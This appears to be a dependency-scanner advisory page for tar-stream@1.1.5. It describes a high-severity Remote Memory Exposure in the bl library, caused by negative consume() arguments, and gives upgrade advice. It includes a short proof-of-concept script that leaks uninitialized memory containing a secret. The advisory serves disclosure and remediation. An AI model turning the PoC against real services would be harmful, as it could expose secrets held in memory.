tar-stream@1.1.5

Vulnerabilities

1 via 1 paths

Dependencies

10

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0

high severity

Remote Memory Exposure

  • Vulnerable module: bl
  • Introduced through: bl@0.9.5

Detailed paths

  • Introduced through: tar-stream@1.1.5 bl@0.9.5
    Remediation: Upgrade to tar-stream@1.2.1.

Overview

bl is a library that allows you to collect buffers and access with a standard readable buffer interface.

Affected versions of this package are vulnerable to Remote Memory Exposure. If user input ends up in consume() argument and can become negative, BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular .slice() calls.

PoC by chalker

const { BufferList } = require('bl')
const secret = require('crypto').randomBytes(256)
for (let i = 0; i < 1e6; i++) {
  const clone = Buffer.from(secret)
  const bl = new BufferList()
  bl.append(Buffer.from('a'))
  bl.consume(-1024)
  const buf = bl.slice(1)
  if (buf.indexOf(clone) !== -1) {
    console.error(`Match (at ${i})`, buf)
  }
}

Remediation

Upgrade bl to version 2.2.1, 3.0.1, 4.0.3, 1.2.3 or higher.

References